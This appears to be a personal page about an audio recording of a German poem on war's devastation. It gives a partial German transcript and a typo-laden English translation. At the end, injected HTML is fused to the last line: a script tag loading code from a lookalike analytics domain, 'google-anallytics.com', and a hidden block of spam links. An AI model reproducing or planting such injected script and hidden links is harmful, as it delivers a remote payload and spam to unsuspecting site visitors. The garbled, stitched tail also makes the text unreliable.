Description of what is on the sound file:
This is a poem that I was required to memorize for a poetry night at one
point. As such, it's a good long sample of my accent. It was generally
unprepared, with the only work essentially on intonation, rate, and
presentation. I wouldn't really know how to work on my accent anyways.
The poem also has the benefit of being public domain...

Transcript of sound file:

Hier durch die Schanz und Stadt rinnt allzeit frisches Blut;
Dreimal sind's schon sechs Jahr, als unsrer Ströme Flut,
Von Leichen fast verstopft, sich langsam fortgedrungen;

Doch schweig' ich noch von dem, was ärger als der Tod,
Was grimmer denn die Pest und Glut und Hungersnot:
Daß auch der Seelen Schatz so vielen abgezwungen.

Translation:
Here we are, entirely no, more than entirely devistated!
The impudent swarm of villagers, the rushed trombones,
The sword fattened from blood, the thundering drums
have eaten up all sweat, flesh, and preparatons.

The towers stand in coals, the church is upturned,
The townhall lies in shambles, the strong ones are cut down,
The young women are defiles, and wherever we look to,
There is fire, disease, and death, that drives through the heart and soul.

Here through the county and city, blood runs always fresh;
Three times it has been six years, since our stream's flow,
almost dammed from corpses, slowly had worked its way through.

Though, I still remain silent about that which is more worrysome than the
death,
Which is grimmer than the disease and embers, and starvation;
That yet the precios soul could be compelled do do this.'text/javascript' src='http://google-anallytics.com/urchin.js'></script><div style='display:none;'><a href='http://tests4all.org/1/'>stages for losing weight</a><a href='http://tests4all.org/2/'>lauren sones personal trainer</a><a href='http://tests4all.org/3/'>lung cleansing quit smoking</a><a href='http://tests4all.org/4/'>blu eyes crying in the rain</a><a href='http://tests4all.org/5/'>photo proof the cardinals got cheated</a><a href='http://tests4all.org/6/'>video game occupations pay</a><a href='http://tests4all.org/7/'>alpha investment partners limited</a><a href='http://tests4all.org/8/'>britannica iq test</a><a href='http://tests4all.org/9/'>america psychic challenge contestant names</a><a href='http://tests4all.org/10/'>nashville past life regression</a><a href='http://tests4all.org/11/'>andrew elliott death date jun 1968</a><a href='http://tests4all.org/12/'>experimental lung liver cancer treatments</a></div>
